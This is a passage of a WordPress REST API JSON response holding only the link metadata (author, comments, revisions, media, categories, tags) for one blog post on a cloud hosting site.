2\/posts"}],"about":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/users\/21"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/comments?post=6025"}],"version-history":[{"count":1,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/6025\/revisions"}],"predecessor-version":[{"id":7578,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/6025\/revisions\/7578"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/media\/6032"}],"wp:attachment":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/media?parent=6025"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/categories?post=6025"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/tags?post=6025"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}